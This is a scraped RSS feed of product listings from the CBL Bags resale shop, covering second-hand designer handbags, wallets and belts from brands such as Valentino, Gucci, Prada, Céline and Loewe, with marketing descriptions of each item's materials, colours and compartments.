Chic and ideal for any occasion. This light grey Valentino WOC is made of calfskin leather and metal studs. Thanks to clean lines, the result is a smart and edge design. It is great to wear cross body or as a clutch bag, as its long silver chain is removable. Inside it is divided in two flat pockets and one zippered; also it has a plenty space for cards where in addition a phone can be located.

 

La entrada Valentino Bag se publicó primero en CBL Bags.

]]>
Valentino Bag https://www.cblbags.com/en/p/valentino-bag-5/ Tue, 18 Apr 2017 10:59:55 +0000 https://www.cblbags.com/?post_type=product&p=12475/ This bag is more than a mini one, the Valentino Rockstud is a perfect bag for anyone looking for a different design full of personality. Different and unusual, this bag is fashion statement.

La entrada Valentino Bag se publicó primero en CBL Bags.

]]>
The neon color and the metal studs along its silhouette and shoulder strap are the key points of this bag. This Mini Valentino Pink Rockstud is a lightweight bag and perfect to wear as a crossbody. This bag is made of soft calfskin leather and its clasp is the classic one from the Italian house, geometric and sharp. Its interior is lined in beige fabric and it has a wall pocket with neon pink leather trim.

La entrada Valentino Bag se publicó primero en CBL Bags.

]]>
Prada Bag https://www.cblbags.com/en/p/prada-bag-4/ Tue, 18 Apr 2017 10:51:25 +0000 https://www.cblbags.com/?post_type=product&p=12472/ This Prada model is a super comfy and roomy crossbody bag ready to keep all your daily needs. A multi-purpose bag with Prada's top refinement.

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
This Prada model is the BN2106. It is crafted mainly in nylon for its body and Saffiano leather for the top double handles. On the upper part, across the top zipper, a small flap also in Saffiano closes with a magnetic clasp and opens up to small wall pocket on the front. If you slide the zipper, this handbag opens to an interior lined with Prada monogrammed synthetic fabric including a zipper pocket. This bag comes with a removable leather strap and metallic feet for bottom protection. Every metallic piece is gold tone bathed.

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
Gucci Bag https://www.cblbags.com/en/p/gucci-bag-horsebit-patent-leather-burgundy/ Thu, 13 Apr 2017 10:40:18 +0000 https://www.cblbags.com/?post_type=product&p=12611/ This Horsebit line Gucci bag has an appealing design with a classic allure. In burgundy patent and shiny golden pieces neither the bag nor yourself won't be unnoticed.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Crafted of shiny burgundy patent leather. Featuring adjustable shoulder strap to wear it on your shoulder. This Gucci closes with a flap sliding under a leather pad with golden metallic Horsebit decor along with golden metallic pieces. The flap opens to a textile in suede burgundy and ecru lining featuring striped and Gucci logo colored pattern. Includes an interior zip closure.

 

 

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Céline Bag https://www.cblbags.com/en/p/celine-bag-3/ Mon, 03 Apr 2017 16:52:47 +0000 https://www.cblbags.com/?post_type=product&p=12280/ Céline has reintroduced an updated version of the Trotteur Bag being this style a contemporary and modern one. Rounded shape and clean lines that turns this design to a timeless one.

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
Pure design. This Céline Trotteur is famous because its clean and simple elegance. We can define it as the perfect crossbody. Big flap, metal golden buckle, single slit pocket on its back and a lovely grained leather. This Trotteur also features a stunning taupe grey color being the perfect luxuty basic. Also, the inner part is lined with a super smooth leather in the same color and it is divided in three departments.

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
Valentino Bag https://www.cblbags.com/en/p/valentino-bag-3/ Mon, 03 Apr 2017 10:04:50 +0000 https://www.cblbags.com/?post_type=product&p=12249/ Great as a crossbody bag is also the perfect chic item to light up an outfit. Full of color and metal studs, this furry and cozy bag is mini but with enough space to keep your essentials.

La entrada Valentino Bag se publicó primero en CBL Bags.

]]>
Mini but full of personality. This Rockstud by Valentino is a bag designed based on details as is different because of them. Its colors black and pink, its metal studs, its calf hair and its famous clasp. Ultralight and sophisticated is the perfect crossbody bag for your edge outfits and also the must for the most basic ones.

La entrada Valentino Bag se publicó primero en CBL Bags.

]]>
Valentino Bag https://www.cblbags.com/en/p/valentino-bag-glam-lock-beaded-rockstud-multicolor-black-leather/ Thu, 16 Mar 2017 12:07:08 +0000 https://www.cblbags.com/?post_type=product&p=11973/ A superb Glam Lock from the SS2016 Collection. Black smooth leather combined with the bead embroidery embellishment in a unique way. One of a kind bag.

La entrada Valentino Bag se publicó primero en CBL Bags.

]]>
This bag is a superb model from the spring-summer 2016 collection. A Valentino Beaded African Lock Flap Medium crafted from black smooth leather and bead embellishments with embroidery. This beautiful flap bag features long gold-tone chain strap that allows it to be worn as a crossbody or on shoulder. Its signature gold pyramid studs at the center and gold tone hardware accents match amazingly with the multicolor front. Its push-lock closure opens to a black suede-lined interior that includes side zip and slip pockets perfect for daily essentials.

La entrada Valentino Bag se publicó primero en CBL Bags.

]]>
Goyard Wallet https://www.cblbags.com/en/p/goyard-wallet-compact-chevron-goyardine-plum-yellow/ Fri, 10 Mar 2017 10:29:32 +0000 https://www.cblbags.com/?post_type=product&p=11888/ A compact and complete wallet. A bold and stunning plum-yellow color combination contrasting with the Goyardine canvas and white stitching. Just breathtaking.

La entrada Goyard Wallet se publicó primero en CBL Bags.

]]>
Goyard wallet Compact Chevron made of stunning Goyardine canvas in plum and yellow color. This wallet is divided into two different compartments: the purse and the billfold. The purse opens up to a double partition and closes with push-lock. The billfold also closes with push-lock with a small strap and features six card slots, two compartments for bills and two flat pockets. The wallet’s interior is wholly crafted of leather, making a superb contrast with the outside canvas and the white stitching, along with the yellow inner parts that nicely pop up now and then.

La entrada Goyard Wallet se publicó primero en CBL Bags.

]]>
Gucci Bag https://www.cblbags.com/en/p/gucci-bag-padlock-gg-supreme-small-canvas-patent/ Wed, 08 Mar 2017 17:28:36 +0000 https://www.cblbags.com/?post_type=product&p=11761/ A stunning combination of colors and textures make of this bag a remarkable item. A brand new Gucci including all its accessories.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
The Small Padlock model from Gucci is crafted of Supreme GG canvas. Sides and bottom are covered with orange patent leather. It also shows a slide pocket on the back in fuchsia patent. This wonderful bag includes a tirette with clochette in fuchsia patent and clear pink trimmings alongside its shape. It stands out because of the gold tone hardware: a sliding chain that allows to wear bag either on your shoulder or cross-body and the remarkable padlock clasp that secures the top flap to close the bag. The interior is lined with alcantara fabric in purple and clear pink and includes a slide pocket as well.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-bag-4/ Wed, 01 Mar 2017 19:23:54 +0000 https://www.cblbags.com/?post_type=product&p=11616/ The Amazona bags are expertly crafted pieces, bags extremely well-made and great as an everyday purse but this BB style is a dream as an evening accesory thanks to its size and its dark velvet, a combination that might be your best choice.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
It is one of the timeless bag that is on trend every season. The Loewe’s Amazona most iconic bag are made taking care every detail and  crafted with sublime leathers and materials and this BB bag is indeed a good example. Featuring a small size and with a soft touch thanks to its black velvet, its front displays the famous logo full of shiny ornament stones that transform this cozy accessory to the perfect one for an evening outfit. With its traditional double handle, this Amazon BB is irresistible!

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Céline Bag https://www.cblbags.com/en/p/celine-bag-2/ Mon, 27 Feb 2017 18:25:43 +0000 https://www.cblbags.com/?post_type=product&p=11526/ Since its launch in 2010, the Celine Luggage bag has been the “It” bag. Easily recognized because its rounded shapes and its winged slides, today is still one of the most desired bags. This one in an intense "coquelicot" color is terrific!

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
This style is one of the most wanted. This Céline Mini Luggage Tote, is one of the top ten bags, actually is a must piece. Flattering and stylish this double handle and front pocket bag is an accessory that also stands out for its beautiful and deep “poppy” color. Made of a resistant calfskin leather and in perfect condition, its top zipper closure opens to a roomy matching red microfiber interior with some pockets for storing your daily essentials.

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
Céline Bag https://www.cblbags.com/en/p/celine-bag-nano-luggage-black-calfskin/ Thu, 23 Feb 2017 11:52:58 +0000 https://www.cblbags.com/?post_type=product&p=11428/ Gorgeous Nano model belonging to the Lugagge line. A must for the most elegant fashion lovers. Celine, always a touch of refinement.

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
The well-known Luggage line from Celine’s brand in Nano size. It is a flexible bag crafted of black grained calfskin. It shows every feature that has made the Lugagge line famous: double round handle with the stitched bottom, its front zipper below them, the embossed leather accents and, above all, the extendible sides in trapezoid shape. Besides, it has top zipper, palladium hardware and removable strap. Interior is lined with black microfiber and contains a slide pocket.

 

 

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
Gucci Bag https://www.cblbags.com/en/p/gucci-bag-soho-disco-leather-maple-brown/ Wed, 22 Feb 2017 17:23:57 +0000 https://www.cblbags.com/?post_type=product&p=11424/ A super trendy bag, this Soho Disco can be found in every single fashion lover's closet nowadays. Here we introduce it in maple brown color.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Small and easy to wear thanks to its thin and adjustable strap, this Gucci Soho Disco in natural-grained maple brown leather is light and really feminine. Its front side shows the interlocked embossed GG. It has top zipper and soft gold metallic accents. A nice tassel with metallic bottom serves as zipper pull. The zipper opens to an off-white cotton linen fabric containing a patch pocket and a slide pocket, both open.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Gucci Belt https://www.cblbags.com/en/p/gucci-belt-gg-buckle-canvas-leather/ Tue, 24 Jan 2017 11:38:24 +0000 https://www.cblbags.com/?post_type=product&p=11258/ The timeless and renowned Gucci belt crafted of GG canvas. To be easily combined and showed to the world as the style icon it is.

La entrada Gucci Belt se publicó primero en CBL Bags.

]]>
The classic from the Italian brand, an iconic model that blends its timeless GG canvas with leather and the unmistakeable interlocked GG buckle. In very soft and matching colors, this belt has a leather-crafted black inner side. Besides, the palladium hardware, gives the final touch to this really stylish and easy to wear belt.

La entrada Gucci Belt se publicó primero en CBL Bags.

]]>
Gucci Backpack https://www.cblbags.com/en/p/gucci-backpack/ Tue, 10 Jan 2017 09:33:00 +0000 https://www.cblbags.com/?post_type=product&p=11131/ This Gucci style shows off the classic GG canvas and is perfectly suitable for everyday because its size and its two exterior pockets to have handy all you need.

La entrada Gucci Backpack se publicó primero en CBL Bags.

]]>
Comfortable and ultra light. This Gucci style made of the traditional GG canvas combines brown nylon and leather trims. It closes with a palladium piston strap being the only but essential detail of the item. Spacious and with adjustable nylon handles, it has two exterior pockets great to store your items quite handy. It opens to a roomy interior through a leather drawstring closure. Superb!

La entrada Gucci Backpack se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-bag-3/ Mon, 09 Jan 2017 18:13:50 +0000 https://www.cblbags.com/?post_type=product&p=11105/ Lined with a marvel fine leather in the same exterior golden color, this style is always a good option if you are looking for a super bag but at the same time a discreet one to be the perfect touch if you wish an elegant outfit.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
This style is truly an iconic style and more than famous around the word. This Amazona 32 is made of suede and fine leather on the base, handles and on some bag details. Also, its color tandem is one of the most Loewes’ recognizable palette, beige and brown. This bag is truly a fashionable  handbag and ultra light style to carry comfortably.


La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Céline Clutch https://www.cblbags.com/en/p/celine-clutch/ Thu, 05 Jan 2017 11:04:41 +0000 https://www.cblbags.com/?post_type=product&p=11049/ A charming piece made of a delicate and shiny lizard skin. This is indeed a romantic clutch ideal to combine with every single one of your evening outfit.

La entrada Céline Clutch se publicó primero en CBL Bags.

]]>
The vintage Céline bags are famous because its sober and elegant lines. This bag with a classic flair touch is made of lizard leather with a delicate shiny finished. This vintage clutch closes with a push lock and it is lined with a fine and smooth black leather. Elegant and sophisticated it is indeed a key item.

 

La entrada Céline Clutch se publicó primero en CBL Bags.

]]>
Gucci Bag https://www.cblbags.com/en/p/gucci-bag-6/ Thu, 05 Jan 2017 10:12:43 +0000 https://www.cblbags.com/?post_type=product&p=11017/ This vintage Gucci Messenger bag is the perfect cross body. Made of brown leather and rounded shape, it is easy to carry thanks to its lightness.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
This vintage messenger Gucci bag is a perfect urban style. Made of a soft and brilliant leather, this rounded shape bag has a leather strap, small flap and small golden metal pieces. On this flap it shows the double GG and it closes with a snap clasp. Its interior has the perfect capacity to carry your essentials.


La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Christian Lacroix Bag https://www.cblbags.com/en/p/christian-lacroix-bag/ Wed, 04 Jan 2017 16:44:06 +0000 https://www.cblbags.com/?post_type=product&p=10982/ Christian Lacroix is a designer famous because its creativity and freshness. That is why his evening bags designs are unique and extravagant. This accessory is full of colors, details and fantasy.

La entrada Christian Lacroix Bag se publicó primero en CBL Bags.

]]>
A different evening style bag made of a nice colourful tapestry fabric. Bronce, red, gold and black as a color-based is the chic mix of this design. This Christian Lacroix vintage bag has a multicolor stone embellishment combined with a plain back side who shows the beautiful colors of its fabric. This accessory closes with a small flap and a push lock and its interior is lined in black fabric. Thanks to its shoulder strap, this evening bag is terribly comfortable.

 


La entrada Christian Lacroix Bag se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-bag-amazona-36-soft-grained-leather-brown/ Tue, 27 Dec 2016 18:49:59 +0000 https://www.cblbags.com/?post_type=product&p=10684/ Its brown, grained leather along with the golden metallic pieces make of this bag a very singular and elegant piece.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Soft Leather Brown Handbag with its iconic rectangular shape from the Amazona bag. Crafted of soft and grained brown leather, this bag is malleable and really graceful. It features rolled top handles and almost wrap-around double zipper. Gold tone hardware and reinforced base and corners with protective metallic studs. The zipper opens to a brown fabric lining with large zipper pocket, a slid pocket and a cell-phone size patch pocket.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Dior Bag https://www.cblbags.com/en/p/dior-bag/ Wed, 21 Dec 2016 18:54:09 +0000 https://www.cblbags.com/en/?post_type=product&p=10581 Chic and elegant clutch with a vintage flair. This Miss Dior New Lock Promenade bag is a stunning bag made of soft and supple quilted natural calfskin leather with cannage pattern embroidery. Delicious!

La entrada Dior Bag se publicó primero en CBL Bags.

]]>
This New Lock Promenade in natural color embodies all of Dior’s modern and timeless style. This pouch made of calfskin leather with a patent coated has silver hardware and detachable chain so it can be carried across the body, on the shoulder or in the hand. Silver-tone clasp and well organized interior with a card holder wall and plenty space for your essentials. With the recognizable “cannage” topstitching, this pouch is a must in elegance, practicality and lightness.

 

La entrada Dior Bag se publicó primero en CBL Bags.

]]>
Jimmy Choo Clutch https://www.cblbags.com/en/p/jimmy-choo-clutch/ Wed, 30 Nov 2016 12:25:06 +0000 https://www.cblbags.com/en/?post_type=product&p=10109 Really nice convertible clutch with an elegant and comfy shape. The ideal piece to give a touch of glam to your regular look or to combine with your soirée outfit. Essential.

La entrada Jimmy Choo Clutch se publicó primero en CBL Bags.

]]>
Crafted of leather with a metallic glittery finish. It includes removable large-link chain with leather pad to comfortably wear it on your shoulder. It attaches to the clutch thanks to a pair of carabiniers in both sides. This clutch closes with a flap provided of magnetic clasp with signature badge. Inside, we find plain leather and synthetic fabric lining in champagne beige. Six card slots and a zipped purse help you organize your essentials.
– This clutch is in very good condition. Just a super small pen mark in lining.
– Serial code: 00R7L3.
(Internal reference: CBL663)

La entrada Jimmy Choo Clutch se publicó primero en CBL Bags.

]]>
Prada Wallet on Chain https://www.cblbags.com/en/p/prada-wallet-on-chain-saffiano-metal-bluette/ Wed, 16 Nov 2016 17:21:55 +0000 https://www.cblbags.com/en/?post_type=product&p=9781 The ultimate mix between wallet, clutch and cross body. Smart and casual. A Saffiano leather that will make you shine.

La entrada Prada Wallet on Chain se publicó primero en CBL Bags.

]]>
Prada bag conceived as a Wallet on Chain. It can be carried as a clutch once you remove the interwoven chain or simply keep it on and wear it cross body. The chain is adjusted to the bag under the flap thanks to two press locks, as it can be seen in the last picture. It is crafted of durable Saffiano Metal leather in “bluette” color. It features golden hardware and press lock closure. Multipurpose interior is divided in three compartments, one of them a zipped up purse and another with slots for cards. Third one es open and plain. The WOC also has a flat pocket in the back wall of the bag and two more flat pockets on the exterior under the flap. Lining is made of Saffiano and synthetic fabric.

La entrada Prada Wallet on Chain se publicó primero en CBL Bags.

]]>
Gucci bag https://www.cblbags.com/en/p/gucci-bag-5/ Fri, 11 Nov 2016 18:16:25 +0000 https://www.cblbags.com/en/?post_type=product&p=9736 The Vintage Web Original GG Boston bag is the ideal one for those who are looking for a perfect size bag, ultralight and easy to combine with an urban outfit. With a detachable strap, this version in blue is terrific.

La entrada Gucci bag se publicó primero en CBL Bags.

]]>
The famous GG canvas in blue and beige is the perfect blend for the navy blue and red stripe. With gold-tone hardware and navy blue leather trim, this bag includes a detachable and flat strap and dual rolled top handle. This bag opens to a very roomy interior and it is lined in the classic light beige canvas.

 

La entrada Gucci bag se publicó primero en CBL Bags.

]]>
Prada Bag https://www.cblbags.com/en/p/prada-bag-saffiano-lux-rame-terracota/ Thu, 03 Nov 2016 17:02:09 +0000 https://www.cblbags.com/?post_type=product&p=9521 The amazing Saffiano leather joins the Rame color in this classic-lines bag that yet offers a trendy touch. It includes strap and authenticity card among other accessories. A must.

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
Prada bag is crafted of superb Saffiano Lux leather. This model has a rigid shape in “Rame” color, a terracota tonality. It shows double short handle and includes a removable and adjustable strap to wear it cross-body. Gold tone hardware matches nicely with the color of the bag and its tirette and clochette hold a golden grommet to use as a key ring. The bag is divided in three compartments: the main one in the centre is a tote; side ones close with a top zipper. In addition, the base features protective studs and the sides of the bag can be extended thanks to a push lock clasp. This Saffiano is designed with the Prada decorative slot in the upper left corner.

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-bag-amazona-36-suede-beige/ Thu, 03 Nov 2016 12:35:49 +0000 https://www.cblbags.com/?post_type=product&p=9485 The iconic model dresses in beige suede. Along with its chocolate trimmings, earthly tones wonderfully spring to give this bag such a serene strength.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
The icon from Loewe, the Amazona 36. This particular item is crafted of beige suede, matching perfectly with its trimmings, made in brown chocolate cowhide leather. The handbag features double short handle to carry it by hand and palladium hardware. The zipper is an almost “wrap-around”, allowing the bag to open widely but still preserving its geometrical shape, for the base and corners are reinforced with leather. Besides, the white stitching alongside the edges frames this Amazona and strikes an amazing earthly contrast with beige and brown colors. It includes metallic studs for better protection on the base and synthetic brown lining with Loewe pattern.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-bag-amazona-36-suede-burgundy/ Mon, 24 Oct 2016 12:01:53 +0000 https://www.cblbags.com/?post_type=product&p=9436 Handbag of delicate craft in suede with superb burgundy color. With brown cowhide leather and white stitchings this piece stands out for its refined beauty.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
An iconic model from Loewe, this beautiful Amazona 36 crafted of burgundy suede keeps all the elegance from this timeless model while offering a touch of difference. Trimmings are made in brown chocolate cowhide leather. The handbag features double short handle to carry it by hand and palladium hardware. The zipper is an almost “wrap-around”, allowing the bag to open widely but still preserving its geometrical shape, for the base and corners are reinforced with leather. Besides, the white stitching alongside the edges frames this Amazona and strikes an amazing contrast with burgundy and brown colors. It includes metallic studs for better protection on the base and synthetic brown lining with Loewe pattern.

 

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Gucci Bag https://www.cblbags.com/en/p/gucci-bag-4/ Thu, 06 Oct 2016 10:16:31 +0000 https://www.cblbags.com/?post_type=product&p=9267 A roomy and easy-access tote which combines a very comfortable usage with the fine Gucci style. Multipurpose and stylish.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Crafted of GG coated canvas, this Gucci tote features two flat, brown straps to wear it on your shoulder. One side in canvas, another in leather. Brown canvas trim front and back and Gucci leather badge. The bag shows brown fabric lining with an interior zipped pocket.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Gucci Bag https://www.cblbags.com/en/p/bolso-gucci-canvas-bamboo-horsebit-print/ Tue, 20 Sep 2016 18:19:02 +0000 https://www.cblbags.com/?post_type=product&p=9086 A super light and stylish tote. Great to show a casual-chic city look or to carry your essentials to the beach. Indeed, super adaptable bag.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
This chic tote is crafted of a canvas iconically printed with horsebits made of bamboo. The bag features long leather strap top handles and trim along the top. It is a magnificent tote which opens to a very roomy interior lined with brown striped fabric. It has a goldtone Gucci charm. Base is reinforced in brown leather and it has a side, zipped interior pocket.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-bag-amazona-vintage-crocodile/ Mon, 12 Sep 2016 16:28:22 +0000 https://www.cblbags.com/?post_type=product&p=8955 Great bag in dark brown crocodile with Loewe's iconic shape. Exoticism and classic cut blend in one single piece.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
A bag from the Spanish brand Loewe showing the iconic shape and details from the Amazona model. Crafted of exotic, crocodile, matte leather. Double handle and gold tone hardware. It features metallic studs on its base for protection and suede, camel lining. The interior offers more space with two zipped pockets.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Gucci Travel Bag https://www.cblbags.com/en/p/gucci-travel-bag-gg-canvas-leather/ Mon, 12 Sep 2016 11:57:49 +0000 https://www.cblbags.com/?post_type=product&p=8931 Superb and well preserved travel bag that takes you back to the great journeys of the beginning of the 20th century. Experience the elegance and class of transatlantic voyages.

La entrada Gucci Travel Bag se publicó primero en CBL Bags.

]]>
This magnificent travel bag reminds of the luggage used in the beginnings of 20th century. It is crafted of iconic GG canvas. Its rigid structure in trapezoid shape is perfectly conceived to protect your necessaries. The base, sides and covering flap are manufactured in brown leather. The flap adjusts to the frontal part of the canvas by two buckles. It features two long handles to carry the bag on your shoulder or by hand. The base is highly reinforced and features decorative and protective studs at the bottom. Gold tone hardware and tirette, with a Gucci tag hanging from it. Black fabric lining including a width-sized zipper side pocket.

La entrada Gucci Travel Bag se publicó primero en CBL Bags.

]]>
Dior Pouch https://www.cblbags.com/en/p/dior-pouch/ Fri, 09 Sep 2016 17:49:17 +0000 https://www.cblbags.com/?post_type=product&p=8905 Smaller than the Miss Dior, the style is also definitely so feminine and keeps Dior's modern features: lambskin leather enhanced by cannage stitching.

La entrada Dior Pouch se publicó primero en CBL Bags.

]]>
It is a very versatile design and the perfect Dior accessory. Featuring an intense violet color combined with the classic “canagge” the result is a beautiful bag perfect for any occasion. This bag also includes a removable chain and a leather interior, the final touch. In addition, it is divided in comparments and organized as a card holder. Its clasp is a golden S-lock placed on a decorative band which wraps the front of the bag.  A bag which appears to be meant to become an icon “for the evenings”.

La entrada Dior Pouch se publicó primero en CBL Bags.

]]>
Bulgari Bag https://www.cblbags.com/en/p/bulgari-bag-serpenti-scaglie-top-handles-tote/ Fri, 09 Sep 2016 10:03:46 +0000 https://www.cblbags.com/?post_type=product&p=8835 This style is unique and easy to wear. Chic, elegant and different. Ideal as an evening bag, as it is a jewel bag itself.

La entrada Bulgari Bag se publicó primero en CBL Bags.

]]>
This ‘Serpenti Scaglie’ tote bag by Bulgari is made of calfskin black leather and snake skin effect on the consistent handles trimmed in black, white and pale gold. It features golden hardware and push lock closure. This style combines two colors: gold and black on both sides. Its interior is lined with a soft and great black suede. We can find an interior zip pocket and a superb pocket with flap closure made of gold calf skin leather. The highlight of the inside is the snake head which serves as a zipper pull, the “Scaglie” mark. Its base has four metallic studs which still keep the plastic covers from the original packaging. This covers are also located on the strap golden carabiniers.

La entrada Bulgari Bag se publicó primero en CBL Bags.

]]>
Prada bag https://www.cblbags.com/en/p/prada-bag-3/ Mon, 18 Jul 2016 17:57:15 +0000 https://www.cblbags.com/?post_type=product&p=8549 The Prada Black Vitello Daino handbag with a monogram fabric interior it is an ideal style for all your necessities. The example of the chic sophistication of Prada.

La entrada Prada bag se publicó primero en CBL Bags.

]]>
A perfect bag, it features a double handle and a shoulder strap. It is made of calfskin leather with gold hardware having as a result a stunning style. Its dimensions are reduced but its leather is resistant and grateful. It incorporates an ID holder, lock and keys. In addition, its interior is lined in black leather, being the classic lining of the Italian house. It is a ultra weight and it has metal studs to place it anywhere.

La entrada Prada bag se publicó primero en CBL Bags.

]]>
Bottega Venetta Bag https://www.cblbags.com/en/p/bottega-venetta-bag/ Tue, 05 Jul 2016 15:28:03 +0000 https://www.cblbags.com/?post_type=product&p=8470 Combining suede and patent leather, this Bottega Venetta is the perfect example of an extremely soft bag.

La entrada Bottega Venetta Bag se publicó primero en CBL Bags.

]]>
Bottega bags are well known because their extreme softness and the complex of their handmade process. As an example, this chocolate color tote combines suede with patent leather accents creating a nice contrast. It performs two top handles which are solid and rounded. Its silhouette is rectangular and its interior is divided into three large spaces. In addition, the interior is lined in a nice and smooth chocolate suede leather.

La entrada Bottega Venetta Bag se publicó primero en CBL Bags.

]]>
Gucci Bag https://www.cblbags.com/en/p/gucci-bag-3/ Mon, 27 Jun 2016 17:51:33 +0000 https://www.cblbags.com/?post_type=product&p=8372 With an adjustable and detachable strap, this Boston Bowling is a perfect urban style.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
It has the flair of Gucci’s classic. Made of GG beige and ebony original canvas with the green/red/green signature color and dark brown leather this medium sized bowling bag, performs double handle and adjustable and removable shoulder strap. Lined with beige fabric, this lightweight bag has a large capacity with interior zip and smart phone pockets and light gold hardware.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Dior Bag https://www.cblbags.com/en/p/dior-bag-2/ Mon, 20 Jun 2016 16:22:43 +0000 https://www.cblbags.com/?post_type=product&p=8248 In a nice neutral color and being an ultralight bag, this Dior Panarea Beige Cannage Canvas is a must for everyday.

La entrada Dior Bag se publicó primero en CBL Bags.

]]>

For its color and shape, this Dior Panarea Beige Cannage Canvas is such and idea bag for everyday. The color of its canvas is great and basic to match with any and as a plus this bag is ultralight. It exterior is reinforced with a nice seam detail in the same beige color. As its size is medium, this bag can be carried as a shoulder or handbag. Also, it includes a silver charm and features a double leather flat handles. Its interior is lined with a beige fabric and has three pockets. Even, the access to it is easy it has a magnetic clasp and as a plus a carabiner. This is definitely a bag for everyday.


La entrada Dior Bag se publicó primero en CBL Bags.

]]>
Prada Bag https://www.cblbags.com/en/p/prada-bag-2/ Fri, 17 Jun 2016 18:05:07 +0000 https://www.cblbags.com/?post_type=product&p=8219 This great Prada made of the stunning saffiano leather is a great bag for busy women. Well organized and ultralight this style is a must in you wardrobe.

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
Grey Saffiano leather Prada Medium Double bag with silver-tone hardware and dual rolled top handles, it is the perfect executive bag. Well organized and divided, with an small compartment at the middle, you could keep your essentials and even a your laptop. With luggage tag and rolled top handle this Prada style is one of the most popular styles. This Prada is also lined with a black leather. An ideal bag for all your needs.

 

 

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
Loewe Bag https://www.cblbags.com/en/p/loewe-bag-2/ Wed, 18 May 2016 15:31:19 +0000 https://www.cblbags.com/?post_type=product&p=7976 This Mini Amazona has its beauty in the stunning combination of colors and the large size logo, impossible to find in the most recent styles.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
In all sizes and colors this style, which was born 40 years ago, is still on trend. This mini bag in bronze and gold colors is a small size bag but ideal as a handbag because its large handles and the lightness of its leather. It is a perfect version to combine during the day and at the same time, show it off at night with toasted and dark colors. With the classic logo in a large size this Amazona is still charming and delicate.

La entrada Loewe Bag se publicó primero en CBL Bags.

]]>
Prada Bag https://www.cblbags.com/en/p/prada-bag/ Wed, 11 May 2016 10:55:20 +0000 https://www.cblbags.com/?post_type=product&p=7948 A unisex style and a really casual bag from Prada. Easy to carry and lightweight, this Bomber is a chic urban style.

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
This style was part of the Prada F/W13 season being of the bags showing a new line of shapes in nylon fabric. Is a superb bag, lightweight, tougher and resistant than any other fabric or thinner nylon. The brand named this fabric “bomber tessuto” and in this style, the Italian brand combines an intense blue with black and the special satin effect of this material. This is a perfect bag for a weekend getaway and ideal as an urban style, thanks to its removable strap in black. Super spacious and with a silver hardware, this Bomber has outside zipper pockets and a zipper closure on the top.

 

 

 

 

 

La entrada Prada Bag se publicó primero en CBL Bags.

]]>
Gucci Bag https://www.cblbags.com/en/p/gucci-bag-2/ Thu, 07 Apr 2016 09:38:45 +0000 https://www.cblbags.com/?post_type=product&p=7707 This Gucci Vintage piece it is pure elegance and keeps all the flair from the 70's. Exquisite!

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Its raspberry color makes it unique and its refined croco porosus leather is the key of its elegance. This Gucci Vintage Clucth is a jewel itself. In a mint vintage condition, this item is lined with a smooth and exquisite leather in the same color. Also, it includes a mini pochette as the perfect company. Its zipper pull is different and includes the name of the brand. The only piece of hardware that the bag includes is its clasp, a nice and interlaced piece. Undoubtedly, an article that has been keep intact all this time and it still retains its whole flair.

La entrada Gucci Bag se publicó primero en CBL Bags.

]]>
Valentino Bag https://www.cblbags.com/en/p/valentino-bag-2/ Mon, 04 Apr 2016 16:40:16 +0000 https://www.cblbags.com/?post_type=product&p=7680 Made of croco porosus and beautiful turquoises, this style is unrepeatable.

La entrada Valentino Bag se publicó primero en CBL Bags.

]]>
There is no doubt about how exclusive this style is. We are in front of a very rare and unusual bag made of black croco porosus. It also has precious stones as turquoises and “swarovski” on both sides completing the shape of two little snakes. This style reminds the vintage bags with a top clasp and with this kind of long shape. Also, it performs a single top and has three inner pockets. Please note, is almost impossible to come across this bag. Terrific!

La entrada Valentino Bag se publicó primero en CBL Bags.

]]>
Céline Bag https://www.cblbags.com/en/p/celine-bag/ Mon, 21 Mar 2016 15:08:00 +0000 https://www.cblbags.com/?post_type=product&p=7556 A pink bag combines with golden studs details and a really soft suede.

La entrada Céline Bag se publicó primero en CBL Bags.

]]>
